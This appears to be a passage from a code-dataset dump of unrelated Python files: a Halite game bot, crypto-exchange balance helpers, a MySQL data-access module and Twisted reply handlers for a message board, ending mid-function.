1 / (len(self.current['dir']) ** 2 * movesX)\n\n if weightX != 0: self.weights[dirX] += value * weightX\n if weightY != 0: self.weights[dirY] += value * weightY\n \n def weight_convert(self, base_threshold=400):\n \"\"\" Weights the option for ship conversion \"\"\"\n # Calculating the threshhold\n threshold = base_threshold + 1000 * (len(self.player.shipyards) // 3)\n # 1. If they are no shipyards left\n no_shipyards = len(self.player.shipyards) == 0\n # 2. There will be a threshold for the amount of cargo any ship could have\n threshhold_reach = self.ship.halite >= threshold\n # 3. On shipyard already\n on_shipyard = self.ship.cell.shipyard is not None\n\n if self.player.halite + self.ship.halite >= 500:\n if no_shipyards and not on_shipyard:\n self.weights['convert'] = 1e8\n elif not on_shipyard:\n self.weights['convert'] = (self.ship_cargo - threshold) * self.CONVERSION\n elif on_shipyard:\n self.eliminated_moves.append('convert')\n else:\n self.eliminated_moves.append('convert')\n\n def weight_moves(self):\n \"\"\" This is the main function and runs other helper functions within the module to to weight the different moves that could be taken. \"\"\"\n \n # Weight the CONVERT option\n self.weight_convert()\n\n # See if any of the shipyards need defending\n self.shipyard_status()\n \n interval = min(220, 11000 // len(self.player.ships) + 1)\n \n # Iterate through different directions\n for direction, cell in dict(list(self.grid.items())[:interval]).items():\n # Set the global direction to the one at hand\n self.current['dir'] = direction\n self.current['cell'] = cell\n\n # 1. Evaluate the moves based on other objects present in the map\n # 1.1 If there was a ship\n if cell.ship is not None:\n # If it was my ship\n if cell.ship.id in self.player.ship_ids:\n self.distribute_ships(cell.ship_id)\n else:\n self.deal_enemy_ship(cell.ship_id)\n\n # 1.2 If there was a shipyard\n if cell.shipyard is not None:\n if cell.shipyard.id in self.player.shipyard_ids:\n self.deposit()\n else:\n self.attack_enemy_shipyard(cell.shipyard_id)\n\n # 2. 
Trigger movement in the main four directions solely based on the amount of halite each cell has\n            main_dir_encourage = self.DIRECTION_ENCOURAGEMENT * self.grid[direction].halite + 10\n            self.add_accordingly(main_dir_encourage, title=' main4: ', loging=False)\n\n            # 3. Either encourage mining or discourage it by adding the difference between cells to the mine\n            mining_trigger = (self.current_cell.halite - self.grid[direction].halite) / len(direction)\n\n            self.weights['mine'] += mining_trigger\n\n        # The correlation of the mining with cell's halite\n        self.weights['mine'] += self.current_cell.halite * self.MINING\n\n    def distribute_ships(self, ship_id):\n        \"\"\" This function lowers the ships' tendency to densely populate an area \"\"\"\n        if not self.near_end() or self.step > 388:\n            if len(self.current['dir']) == 1: self.eliminated_moves.append(self.current['dir'])\n\n            distribution_encouragement = -10 * abs(self.ship_cargo - self.board.ships[ship_id].halite)\n\n            self.add_accordingly(distribution_encouragement, title='Distribution', loging=False)\n\n    def deal_enemy_ship(self, ship_id):\n        \"\"\" This function will evaluate to either attack or get_away from an enemy ship based on the \n        simple observation: if my ship has more cargo, then it should not attack. \"\"\"\n        # If the ship's cargo was more than the enemy's cargo and it was not equal to zero then get away, otherwise attack\n        if self.ship_cargo > (self.board.ships[ship_id].halite + 0.4 * self.current['cell'].halite):\n            self.get_away(cargo_diff=abs(self.board.ships[ship_id].halite - self.ship_cargo))\n        else:\n            self.attack_enemy_ship(abs(self.board.ships[ship_id].halite - self.ship_cargo))\n\n    def attack_enemy_ship(self, diff):\n        \"\"\" This function encourages attacking the enemy ship \"\"\"\n        attack_encouragement = self.ATTACK_ENEMY_SHIP * (diff + 1) / (self.closest_shipyard_distance + 0.1)\n        self.add_accordingly(attack_encouragement, title='Attacking-Enemy-Ship', loging=False)\n    \n    def get_away(self, cargo_diff=0):\n        \"\"\" This function is called when my ship needs to get away from a ship which might be following it \"\"\"\n        # 1. Directly discouraging the movement\n        if len(self.current['dir']) == 1:\n            self.eliminated_moves.append(self.current['dir'])\n            if 'mine' in self.weights.keys(): self.eliminated_moves.append('mine')\n            direction_discouragement = 0\n        elif len(self.current['dir']) == 2:\n            # When the enemy ship is two moves away, there should be a strong discouragement\n            direction_discouragement = 5 * self.GET_AWAY * (self.ship.halite + 10)\n        else:\n            direction_discouragement = self.GET_AWAY * cargo_diff\n        \n        self.add_accordingly(direction_discouragement, title='Get-Away', loging=False)\n\n        # 2. Encouraging going to the closest shipyard\n        closest_shipyard_encouragement = cargo_diff\n        self.go_to_closest_shipyard(closest_shipyard_encouragement)\n\n    def deposit(self):\n        \"\"\" Weights the tendency to deposit and adds to the directions which lead to the given shipyard \"\"\"\n        if self.near_end():\n            deposit_tendency = 16 * self.DEPOSIT * self.ship_cargo\n        else:\n            deposit_tendency = self.DEPOSIT * self.ship_cargo \n        self.add_accordingly(deposit_tendency, title='Deposit', loging=False)\n\n    def attack_enemy_shipyard(self, shipyard_id):\n        \"\"\" Weights the tendency to attack the enemy shipyard. 
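An attack is only weighted in when we have at least\n        two ships, more than 700 stored halite, this ship carries under 30 halite and\n        the shipyard is less than 5 cells away; otherwise a one-step move toward it is\n        eliminated for a ship carrying more than 100 halite.\n        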
\"\"\"\n dist_to_shipyard = measure_distance(self.board.shipyards[shipyard_id].position, self.current['cell'].position)\n if len(self.player.ships) >= 2 and self.player.halite > 700 and self.ship_cargo < 30 and dist_to_shipyard < 5:\n destory_shipyard = 1e5 / len(self.current['dir'])\n self.add_accordingly(destory_shipyard, title='Destroy_en_shipyard', loging=False)\n elif len(self.current['dir']) == 1 and self.ship_cargo > 100:\n self.eliminated_moves.append(self.current['dir'])\n\n def go_to_closest_shipyard(self, value):\n \"\"\" Encourage movement towards the nearest shipyard \"\"\"\n if self.closest_shipyard_id != 0.99: # Given that there is a closest shipyard\n (x, y) = self.board.shipyards[self.closest_shipyard_id].position\n\n if x > self.current_cell.position.x:\n self.weights['E'] += value\n elif x < self.current_cell.position.x:\n self.weights['W'] += value\n\n if y > self.current_cell.position.y:\n self.weights['N'] += value\n elif y < self.current_cell.position.y:\n self.weights['S'] += value\n\n def shipyard_status(self):\n \"\"\" Measures tendency for the shipyards within the map \"\"\"\n if len(self.player.shipyards) != 0:\n for shipyard in self.player.shipyards:\n self.analyze_shipyard_surroundings(shipyard.id)\n\n def analyze_shipyard_surroundings(self, shipyard_id):\n \"\"\" Analyzes the tendency to go toward a specific shipyard \"\"\"\n shipyard, value = self.board.shipyards[shipyard_id], 0\n shipyard_grid = grid(shipyard.cell)\n\n for direction, cell in list(shipyard_grid.items())[:24]:\n ship_id = shipyard_grid[direction].ship_id\n # If there is a ship on that cell\n if cell.ship is not None:\n if cell.ship.id in self.player.ship_ids:\n value += -1e5 / (self.ship_cargo + 0.99)\n else:\n value += 1e5 /(cell.ship.halite + 0.99) \n\n # Don't discourage any move toward a shipyards\n if value > 0:\n currentDir = \"\"\n\n if shipyard.position.x > self.current_position.x:\n currentDir += \"E\" * abs(shipyard.position.x - self.current_position.x)\n elif shipyard.position.x < self.current_position.x:\n currentDir += \"W\" * abs(shipyard.position.x - self.current_position.x)\n\n if shipyard.position.y > self.current_position.y:\n currentDir += \"S\" * abs(shipyard.position.y - self.current_position.y)\n elif shipyard.position.y < self.current_position.y:\n currentDir += \"N\" * abs(shipyard.position.y - self.current_position.y)\n\n if currentDir != \"\":\n self.current['dir'] = currentDir\n self.add_accordingly(value, title=' Yard-sur', loging=True)\n\n def closest_shipyard(self):\n \"\"\" Returns the closest shipyard's id \"\"\"\n closest_id, diff = 0.99, 0.99\n for shipyard in self.player.shipyards:\n distance = measure_distance(self.current_cell.position, shipyard.cell.position)\n if diff > distance or diff == 0.99:\n closest_id, diff = shipyard.id, distance\n return closest_id, diff\n \n def near_end(self):\n \"\"\" Determines if the game is about to end so the ships with halite can convert to shipyard and maximum the halite we will end up with \"\"\"\n count = 0\n # If the halite was less than 500 and it had no ships\n for opp in self.board.opponents:\n if opp.halite < 500 and len(opp.ships) == 0 and self.player.halite > opp.halite: count += 1\n if opp.halite > 2000 and len(opp.ships) > 1: count -= 1\n # If count was more than 2 return True\n return count >= 2\n\n def apply_elimination(self):\n \"\"\" Eliminates the moves to be eliminated. 
\"\"\"\n for move in self.eliminated_moves:\n if move in self.weights.keys():\n del self.weights[move]\n\n def round(self):\n \"\"\" This functions rounds the weights so they can be easily printed \"\"\"\n self.weights['mine'] = round(self.weights['mine'], 1)\n self.weights['N'] = round(self.weights['N'], 1)\n self.weights['S'] = round(self.weights['S'], 1)\n self.weights['E'] = round(self.weights['E'], 1)\n self.weights['W'] = round(self.weights['W'], 1)\n self.weights['convert'] = round(self.weights['convert'], 1)\n\n\n\ndef measure_distance(org, dest):\n \"\"\" Measures the distance between two points \"\"\"\n x_1 = abs(org.x - dest.x)\n x_2 = abs(21 - org.x + dest.x)\n y_1 = abs(org.y - dest.y)\n y_2 = abs(21 - org.y + dest.y)\n\n return min((x_1 + y_1), (x_1 + y_2), (x_2 + y_1), (x_2 + y_2))\n \nclass ShipyardDecisions:\n def __init__(self, board: Board, player, step):\n \"\"\"\n Decides the Shipyard's next action based on the given parameters\n board: The board that we will be observing\n step: step of the stimulation\n \"\"\"\n self.board = board\n self.player = player\n self.player_halite = player.halite\n self.step = step\n self.Shipyards = player.shipyards\n self.shipyard_tendencies = {}\n\n def determine(self):\n \"\"\" Determines which shipyards should SPAWN, returns a dictionary of id: 'SPAWN' \"\"\"\n self.weight_shipyard_tendencies()\n sorted_weights = {k: v for k, v in\n sorted(self.shipyard_tendencies.items(), key=lambda item: item[1], reverse=True)}\n \n shipyard_ids = []\n for shipyard_id, tendency in sorted_weights.items():\n if tendency > 5 and self.player_halite >= 500:\n shipyard_ids.append(shipyard_id)\n\n # log('Shipyards: ' + str(shipyard_ids))\n return shipyard_ids\n\n def weight_shipyard_tendencies(self):\n \"\"\" Iterates through the shipyards and weights their tendencies. 
\"\"\"\n for shipyard in self.Shipyards:\n # Weighting will take place only when there are no ships on the cell\n if shipyard.cell.ship is None:\n weight = self.weight(grid(shipyard.cell))\n\n self.shipyard_tendencies[shipyard.id] = weight\n\n def weight(self, grid):\n \"\"\"\n Weights shipyard's tendency to spawn solely based on the objects around it\n The weighting system is rather simple:\n - If there was an enemy ship add to the weight\n - If there was one of my own ships, then subtract from the weight\n Take the distance of the ship into account\n \"\"\"\n if len(self.board.current_player.ships) == 0: return 10\n if self.step < 150 and self.player_halite >= 500: return 10\n\n value = 0\n # Iterating through the grid\n for direction, cell in grid.items():\n if cell.ship is not None:\n if cell.ship.id in self.player.ship_ids:\n value -= 200 / len(direction) ** 2\n else:\n value += 100 / len(direction) ** 2\n # If there was an enemy ship one move away from my shipyard then spawn\n if len(direction) == 1 and self.player_halite > 500: \n value += 1e3 \n\n if cell.shipyard is not None:\n if cell.shipyard.id in self.player.shipyard_ids:\n value += 50 / len(direction) ** 2\n\n return value\n\ndef grid(cell, moves=10):\n \"\"\" Returns a dictionary of cells which are in 10 moves distance of the given cell \"\"\"\n # The directions that are one move away\n north, south, west, east = cell.north, cell.south, cell.west, cell.east\n # The directions that are two moves away\n n2, s2, w2, e2 = north.north, south.south, west.west, east.east\n n3, s3, w3, e3 = n2.north, s2.south, w2.west, e2.east\n n4, s4, w4, e4 = n3.north, s3.south, w3.west, e3.east\n n5, s5, w5, e5 = n4.north, s4.south, w4.west, e4.east\n n6, s6, w6, e6 = n5.north, s5.south, w5.west, e5.east\n n7, s7, w7, e7 = n6.north, s6.south, w6.west, e6.east\n n8, s8, w8, e8 = n7.north, s7.south, w7.west, e7.east\n n9, s9, w9, e9 = n8.north, s8.south, w8.west, e8.east\n n10, s10, w10, e10 = n9.north, s9.south, w9.west, e9.east\n \n return {\n # 1 move away\n 'N': north, 'S': south, 'W': west, 'E': east,\n # 2 moves away\n 'NW': north.west, 'NE': north.east, 'SW': south.west, 'SE': south.east, 'WW': w2, 'EE': e2, 'NN': n2, 'SS': s2,\n # 3 moves away\n 'SSS': s3, 'EEE': e3, 'WWW': w3, 'NNN': n3,\n 'ENN': n2.east, 'WNN': n2.west, 'ESS': s2.east, 'WSS': s2.west,\n 'SEE': e2.south, 'NEE': e2.north, 'SWW': w2.south, 'NWW': w2.north,\n # 4 moves away\n 'NNNN': n4, 'SSSS': s4, 'WWWW': w4, 'EEEE': e4,\n 'EESS': e2.south.south, 'EENN': e2.north.north, 'WWNN': w2.north.north, 'WWSS': w2.south.south,\n 'WWWS': w3.south, 'EEES': e3.south, 'EEEN': e3.north, 'WWWN': w3.north,\n 'SSSW': s3.west, 'SSSE': s3.east, 'NNNE': n3.east, 'NNNW': n3.west,\n # 5 moves away\n 'SSSSS': s5, 'NNNNN': n5, 'WWWWW': w5, 'EEEEE': e5,\n 'WWWWN': w4.north, 'WWWWS': w4.south, 'EEEEN': e4.north, 'EEEES': e4.south,\n 'SSSSE': s4.east, 'SSSSW': s4.west, 'NNNNW': n4.west, 'NNNNE': n4.east,\n 'EESSS': s3.east.east, 'WWSSS': s3.west.west, 'EENNN': n3.east.east, 'WWNNN': n3.west.west,\n 'EEESS': e3.south.south, 'EEENN': e3.north.north, 'WWWSS': w3.south.south, 'WWWNN': w3.north.north,\n # 6 moves away\n 'SSSSSS': s6, 'NNNNNN': n6, 'WWWWWW': w6, 'EEEEEE': e6,\n 'WWWWWN': w5.north, 'WWWWWS': w5.south, 'EEEEEN': e5.north, 'EEEEES': e5.south,\n 'SSSSSE': s5.east, 'SSSSSW': s5.west, 'NNNNNW': n5.west, 'NNNNNE': n5.east,\n 'WWWWNN': w4.north.north, 'WWWWSS': w4.south.south, 'EEEENN': e4.north.north, 'EEEESS': e4.south.south,\n 'NNNNEE': n4.east.east, 'NNNNWW': n4.west.west, 'SSSSWW': 
s4.west.west, 'SSSSEE': s4.east.east,\n 'EEENNN': e3.north.north.north, 'EEESSS': e3.south.south.south, 'WWWNNN': w3.north.north.north, 'WWWSSS': w3.south.south.south,\n # 7 moves away\n 'SSSSSSS': s7, 'NNNNNNN': n7, 'WWWWWWW': w7, 'EEEEEEE': e7,\n 'WWWWWWN': w6.north, 'WWWWWWS': w6.south, 'EEEEEEN': e6.north, 'EEEEEES': e6.south,\n 'SSSSSSE': s6.east, 'SSSSSSW': s6.west, 'NNNNNNW': n6.west, 'NNNNNNE': n6.east,\n 'WWWWWNN': w5.north.north, 'WWWWWSS': w5.south.south, 'EEEEENN': e5.north.north, 'EEEEESS': e5.south.south,\n 'NNNNNWW': n5.west.west, 'NNNNNEE': n5.east.east, 'SSSSSWW': s5.west.west, 'SSSSSEE': s5.east.east,\n 'EEEENNN': e4.north.north.north, 'EEEESSS': e4.south.south.south, 'WWWWNNN': w4.north.north.north, 'WWWWSSS': w4.south.south.south,\n 'NNNNEEE': n4.east.east.east, 'NNNNWWW': n4.west.west.west, 'SSSSWWW': s4.west.west.west, 'SSSSEEE': s4.east.east.east,\n # 8 moves away\n 'SSSSSSSS': s8, 'NNNNNNNN': n8, 'WWWWWWWW': w8, 'EEEEEEEE': e8,\n 'WWWWWWWN': w7.north, 'WWWWWWWS': w7.south, 'EEEEEEEN': e7.north, 'EEEEEEES': e7.south,\n 'SSSSSSSE': s7.east, 'SSSSSSSW': s7.west, 'NNNNNNNW': n7.west, 'NNNNNNNE': n7.east,\n 'WWWWWWNN': w6.north.north, 'WWWWWWWSS': w6.south.south, 'EEEEEEENN': e6.north.north, 'EEEEEEESS': e6.south.south,\n 'NNNNNNWW': n6.west.west, 'NNNNNNEE': n6.east.east, 'SSSSSSWW': s6.west.west, 'SSSSSSEE': s6.west.west,\n 'NNNNNWWW': n5.west.west.west, 'NNNNNEEE': n5.east.east.east, 'SSSSSWWW': s5.west.west.west, 'SSSSSEEE': s5.east.east.east,\n 'EEEEENNN': e5.north.north.north, 'EEEEESSS': e5.south.south.south, 'WWWWWNNN': w5.north.north.north, 'WWWWWSSS': w5.south.south.south,\n 'EEEENNNN': e4.north.north.north.north, 'WWWWNNNN': w4.north.north.north.north, 'EEEESSSS': e4.south.south.south.south, 'WWWWSSSS': w4.south.south.south.south,\n # 9 moves away\n 'SSSSSSSS': s9, 'NNNNNNNN': n9, 'WWWWWWWW': w9, 'EEEEEEEE': e9,\n 'WWWWWWWWN': w8.north, 'WWWWWWWWS': w8.south, 'EEEEEEEEN': e8.north, 'EEEEEEEES': e8.south,\n 'SSSSSSSSE': s8.east, 'SSSSSSSSW': s8.west, 'NNNNNNNNW': n8.west, 'NNNNNNNNE': n8.east,\n 'NNNNNNNEE': n7.east.east, 'NNNNNNNWW': n7.west.west, 'SSSSSSSEE': s7.east.east, 'SSSSSSSWW': s7.west.west,\n 'EEEEEEENN': e7.north.north, 'EEEEEEESS': e7.south.south, 'WWWWWWWNN': w7.north.north, 'WWWWWWWSS': w7.south.south,\n 'NNNNNNWWW': n6.west.west.west, 'NNNNNNEEE': n6.east.east.east, 'SSSSSSWWW': s6.west.west.west, 'SSSSSSEEE': s6.east.east.east,\n 'EEEEEENNN': e6.north.north.north, 'EEEEEESSS': e6.south.south.south, 'WWWWWWNNN': w6.north.north.north, 'WWWWWWSSS': w6.south.south.south,\n 'NNNNNWWWW': n5.west.west.west.west, 'NNNNNEEEE': n5.east.east.east.east, 'SSSSSWWWW': s5.west.west.west.west, 'SSSSSEEEE': s5.east.east.east.east,\n 'EEEEENNNN': e5.north.north.north.north, 'EEEEESSSS': e5.south.south.south.south, 'WWWWWNNNN': w5.north.north.north.north, 'WWWWWSSSS': w5.south.south.south.south,\n # 10 moves away\n 'SSSSSSSSS': s10, 'NNNNNNNNN': n10, 'WWWWWWWWW': w10, 'EEEEEEEEE': e10,\n 'WWWWWWWWWN': w9.north, 'WWWWWWWWWS': w9.south, 'EEEEEEEEEN': e9.north, 'EEEEEEEEES': e9.south,\n 'SSSSSSSSSE': s9.east, 'SSSSSSSSSW': s9.west, 'NNNNNNNNNW': n9.west, 'NNNNNNNNNE': n9.east,\n 'NNNNNNNNEE': n8.east.east, 'SSSSSSSSEE': s8.east.east, 'NNNNNNNNWW': n8.west.west, 'SSSSSSSSWW': s8.west.west,\n 'EEEEEEEENN': e8.north.north, 'EEEEEEEESS': e8.south.south, 'WWWWWWWWNN': w8.north.north, 'WWWWWWWWNN': w8.north.north,\n 'WWWWWWWNNN': w7.north.north, 'WWWWWWWSSS': w7.south.south, 'EEEEEEESSS': e7.south.south.south, 'EEEEEEEWWW': e7.north.north.north,\n 'NNNNNNNWWW': 
n7.west.west.west, 'NNNNNNNEEE': n7.east.east.east, 'SSSSSSSWWW': s7.west.west.west, 'SSSSSSSEEE': s7.east.east.east,\n 'WWWWWWNNNN': w6.north.north.north.north, 'WWWWWWSSSS': w6.south.south.south.south, 'EEEEEENNNN': e6.north.north.north.north, 'EEEEEESSSS': e6.south.south.south.south,\n 'NNNNNNWWWW': n6.west.west.west.west, 'NNNNNNEEEE': n6.east.east.east.east, 'SSSSSSWWWW': s6.west.west.west.west, 'SSSSSSEEEE': s6.east.east.east.east,\n 'NNNNNWWWWW': n5.west.west.west.west.west, 'NNNNNEEEEE': n5.east.east.east.east.east, 'SSSSSWWWWW': s5.west.west.west.west.west, 'SSSSSEEEEE': s5.east.east.east.east.east\n }\n\nmovement_dictionary = {\"S\": \"SOUTH\", 'N': 'NORTH', 'W': 'WEST', 'E': 'EAST', 'convert': 'CONVERT'}\n\nimport operator\n\ndef agent(obs, config):\n # Another for updates\n board = Board(obs, config)\n\n # Step of the board\n step = board.observation['step']\n\n ships = [ship.id for ship in sorted(board.current_player.ships, key=operator.attrgetter(\"halite\"), reverse=True)]\n actions = {}\n\n for ship_id in ships:\n if ship_id in board.current_player.ship_ids:\n next_action, action_type = DecisionShip(board, ship_id, step).determine()\n \n if action_type != 'mine':\n actions[ship_id] = movement_dictionary[action_type]\n board.ships[ship_id].next_action = next_action\n board = board.next()\n\n shipyard_ids = ShipyardDecisions(board, board.current_player, step).determine()\n\n for shipyard_id in board.current_player.shipyard_ids:\n if shipyard_id in shipyard_ids:\n actions[shipyard_id] = 'SPAWN'\n board.shipyards[shipyard_id].next_action = ShipyardAction.SPAWN\n \n board = board.next()\n \n return actions\n","sub_path":"agents/agent_e.py","file_name":"agent_e.py","file_ext":"py","file_size_in_byte":25661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"591821339","text":"#This is designed to hold the api functions\nfrom bittrex import Bittrex\nfrom binance.client import Client\nfrom config import *\nimport time\nimport pandas as pd\nimport datetime\nimport requests as rq\nimport json\n\n\n#definitions\np = Bittrex(api_key_bittrex, api_secret_bittrex)\nclient = Client(api_key_binance, api_secret_binance)\n\n\ndef send_notification(title, body):\n\tdata_send = {\"type\": \"note\", \"title\": title, \"body\": body}\n\tresp = rq.post('https://api.pushbullet.com/v2/pushes', data=json.dumps(data_send),\n\t\t\t\t\t\t headers={'Authorization': 'Bearer ' + access_token, 'Content-Type': 'application/json'})\n\tif resp.status_code != 200:\n\t\traise Exception('Something wrong')\n\telse:\n\t\tprint('sent')\n\ndef getfiat(btc):\n\tr = rq.get(url='https://blockchain.info/ticker', params='')\n\tdata = r.json()\n\tusd = data['USD']['sell']\n\taud = data['AUD']['sell']\n\taudprice = float(aud)*float(btc)\n\tusdprice = float(usd)*float(btc)\n\treturn audprice, usdprice\n\ndef getbinancebalance():\n\tinfo = client.get_exchange_info()\n\tinfo = info['symbols']\n\tcoins = []\n\tcolumn_headers = ['coin','quantity','last','BTC value']\n\taccount = pd.DataFrame(columns=column_headers)\n\tfor item in info:\n\t\tcoin = item['baseAsset']\n\t\tif coin:\n\t\t\tcoins.append(coin)\n\tlistcoins = list(set(coins))\n\tfor item in listcoins:\n\t\tbalance = client.get_asset_balance(asset=item)\n\t\tquantity = float(balance['free'])\n\t\tif quantity > 0.0:\n\t\t\tif 'BTC' not in item:\n\t\t\t\tmarket = item.replace(item,'%sBTC'%(item))\n\t\t\t\tdepth = client.get_order_book(symbol=market)\n\t\t\t\tlast = depth['asks'][0][0]\n\t\t\t\tlast = '{:.8f}'.format(float(last))\n\t\t\t\tquantity = '{:.8f}'.format(quantity)\n\t\t\t\tvalue = float(last)*float(quantity)\n\t\t\t\tvalue = '{:.8f}'.format(value)\n\t\t\t\taccount = account.append({'coin':market,'quantity':quantity,'last':last,'BTC value':value}, ignore_index=True)\n\t\t\tif 'BTC' in item:\n\t\t\t\tlast = '{:.8f}'.format(0)\n\t\t\t\tquantity = '{:.8f}'.format(float(quantity))\n\t\t\t\tvalue = '{:.8f}'.format(float(quantity))\n\t\t\t\taccount = account.append({'coin':item,'quantity':quantity,'last':last,'BTC value':value}, ignore_index=True)\n\ttotal = pd.to_numeric(account['BTC value'])\n\ttotal_btc = total.sum()\n\ttotal_btc = '{:.8f}'.format(total_btc*0.975)\n\treturn account, total_btc\n\ndef getbittrexbalance():\n\tbalance = p.get_balances()\n\tbalance = balance['result']\n\tcolumn_headers = ['coin','quantity','last','BTC value']\n\taccount = pd.DataFrame(columns=column_headers)\n\tfor item in balance:\n\t\tif item['Balance'] > 0.0:\n\t\t\tbalance = '{:.8f}'.format(item['Balance'])\n\t\t\tcoin = item['Currency']\n\t\t\tif 'BTC' in coin:\n\t\t\t\tlast = float(item['Balance'])\n\t\t\t\tvalue = float(item['Balance'])\n\t\t\t\tvalue = '{:.8f}'.format(value)\n\t\t\t\tlast = '{:.8f}'.format(last)\n\t\t\t\taccount = account.append({'coin':item['Currency'],'quantity':balance,'last':last,'BTC value':value}, ignore_index=True)\n\t\t\tif 'BTC' not in coin:\n\t\t\t\tcoin = coin.replace(coin,'BTC-%s'%(coin))\n\t\t\tmarket = p.get_marketsummary(coin)\n\t\t\t#print(market)\n\t\t\tif market['success'] == True:\n\t\t\t\tlast = market['result']\n\t\t\t\tlast = last[0]['Last']\n\t\t\t\tvalue = float(last)*float(balance)\n\t\t\t\tvalue = '{:.8f}'.format(value)\n\t\t\t\tlast = '{:.8f}'.format(last)\n\t\t\t\taccount = account.append({'coin':item['Currency'],'quantity':balance,'last':last,'BTC value':value}, 
ignore_index=True)\n\ttotal = pd.to_numeric(account['BTC value'])\n\ttotal_btc = total.sum()\n\ttotal_btc = '{:.8f}'.format(total_btc*0.975)\n\treturn account, total_btc\n","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"286013115","text":"import MySQLdb.cursors\n\nclass VoteDemographicValue:\n def __init__(self, votedemographicvalue_id, votedemographic_id, value_name, display_index):\n self.votedemographicvalue_id = votedemographicvalue_id\n self.votedemographic_id = votedemographic_id\n self.value_name = value_name\n self.display_index = display_index\n\ndef create(db, votedemographic_id, value_name, display_index):\n query_str = 'INSERT INTO {0} ({1}, {2}, {3}) values (%s, %s, %s)'.format(TABLE_NAME, FIELD_VOTEDEMOGRAPHICID, FIELD_VALUENAME, FIELD_DISPLAYINDEX)\n curs = db.cursor()\n curs.execute(query_str, [votedemographic_id, value_name, display_index])\n votedemographicvalue_id = curs.lastrowid\n db.commit()\n return VoteDemographicValue(votedemographicvalue_id, votedemographic_id, value_name, display_index)\n\ndef delete_by_x(db, field, x):\n query_str = 'DELETE FROM {0} WHERE {1}=%s'.format(TABLE_NAME, field)\n db.cursor().execute(query_str, [x])\n db.commit()\n\ndef delete(db, votedemographicvalue_id):\n delete_by_x(db, FIELD_VOTEDEMOGRAPHICVALUEID, votedemographicvalue_id)\n\ndef delete_all_for_votedemographic(db, votedemographic_id):\n delete_by_x(db, FIELD_VOTEDEMOGRAPHICID, votedemographic_id)\n\ndef get_all_by_x(db, field, x):\n query_str = 'SELECT {0}, {1}, {2}, {3} FROM {4} WHERE {5}=%s'.format(FIELD_VOTEDEMOGRAPHICVALUEID, FIELD_VOTEDEMOGRAPHICID, FIELD_VALUENAME, FIELD_DISPLAYINDEX, TABLE_NAME, field)\n cur = db.cursor()\n cur.execute(query_str, [x])\n entries = [VoteDemographicValue(row[0], row[1], row[2], row[3]) for row in cur.fetchall()]\n return entries\n\n##################\n# DB Definitions #\n##################\nTABLE_NAME = 'votedemographicvalues'\nFIELD_VOTEDEMOGRAPHICVALUEID = 'votedemographicvalue_id'\nFIELD_VOTEDEMOGRAPHICID = 'votedemographic_id'\nFIELD_VALUENAME = 'value_name'\nFIELD_DISPLAYINDEX = 'display_index'\n","sub_path":"ru_votedemographicvalue.py","file_name":"ru_votedemographicvalue.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"74781657","text":"# -*- coding: utf-8 -*-\nfrom datetime import datetime\nimport json\n\nfrom twisted.web.http import NOT_FOUND, UNAUTHORIZED\nfrom sqlalchemy.orm import subqueryload\n\nfrom exception import BadArgument\nfrom helper.resource import YuzukiResource\nfrom model.article import Article\nfrom model.reply import Reply\nfrom model.reply_record import ReplyRecord\nfrom config import REPLY_PER_PAGE\n\n\nclass ReplyParent(YuzukiResource):\n isLeaf = False\n\n def __init__(self):\n YuzukiResource.__init__(self)\n self.putChild(\"view\", ReplyView())\n self.putChild(\"write\", ReplyWrite())\n self.putChild(\"delete\", ReplyDelete())\n self.putChild(\"edit\", ReplyEdit())\n\n\nclass ReplyView(YuzukiResource):\n _REPLY_PER_PAGE = REPLY_PER_PAGE\n\n def render_GET(self, request):\n article_id = request.get_argument(\"article_id\")\n try:\n page = int(request.get_argument(\"page\", \"1\"))\n except ValueError:\n raise BadArgument(\"page\", request.get_argument(\"page\"))\n query = request.dbsession.query(Article) \\\n .filter(Article.uid == article_id) \\\n .filter(Article.enabled == True) \\\n .options(subqueryload(Article.board))\n result = query.all()\n if not result:\n request.setResponseCode(NOT_FOUND)\n return \"article not found\"\n article = result[0]\n if article.board.name == \"notice\" or (\n request.user and any([group.name == \"anybody\" for group in request.user.groups])):\n query = request.dbsession.query(Reply) \\\n .filter(Reply.article == article) \\\n .filter(Reply.enabled == True) \\\n .order_by(Reply.uid.desc()) \\\n .options(subqueryload(Reply.user))\n start_idx = self._REPLY_PER_PAGE * (page - 1)\n end_idx = start_idx + self._REPLY_PER_PAGE\n result = query[start_idx:end_idx]\n return json.dumps([reply.to_dict() for reply in result])\n else:\n request.setResponseCode(UNAUTHORIZED)\n return \"unauthorized\"\n\n\nclass ReplyWrite(YuzukiResource):\n def render_POST(self, request):\n article_id = request.get_argument(\"article_id\")\n query = request.dbsession.query(Article) \\\n .filter(Article.uid == article_id) \\\n .filter(Article.enabled == True) \\\n .options(subqueryload(Article.board))\n result = query.all()\n if not result:\n request.setResponseCode(NOT_FOUND)\n return self.generate_error_message(request,\n NOT_FOUND,\n \"Not Found\",\n u\"게시글이 존재하지 않습니다.\")\n article = result[0]\n if request.user and request.user in article.board.comment_group.users:\n content = request.get_argument(\"content\")\n # no empty reply\n if content.strip():\n reply = Reply(article, request.user, content)\n request.dbsession.add(reply)\n article.reply_count += 1\n request.dbsession.commit()\n page = request.get_argument(\"page\", None)\n redirect = \"/article/view?id=%s\" % article.uid\n if page:\n redirect += \"&page=%s\" % page\n request.redirect(redirect)\n return \"success\"\n else:\n raise BadArgument(\"content\", \"empty\")\n else:\n request.setResponseCode(UNAUTHORIZED)\n return self.generate_error_message(request,\n UNAUTHORIZED,\n \"Unauthorized\",\n u\"댓글을 쓸 권한이 없습니다.\")\n\n\nclass ReplyDelete(YuzukiResource):\n def render_DELETE(self, request):\n reply_id = request.get_argument(\"id\")\n query = request.dbsession.query(Reply) \\\n .filter(Reply.uid == reply_id) \\\n .filter(Reply.enabled == True) \\\n .options(subqueryload(Reply.user))\n result = query.all()\n if not result:\n request.setResponseCode(NOT_FOUND)\n return \"reply not found\"\n reply = result[0]\n if request.user and (request.user == reply.user or request.user.is_admin):\n reply.enabled = False\n 
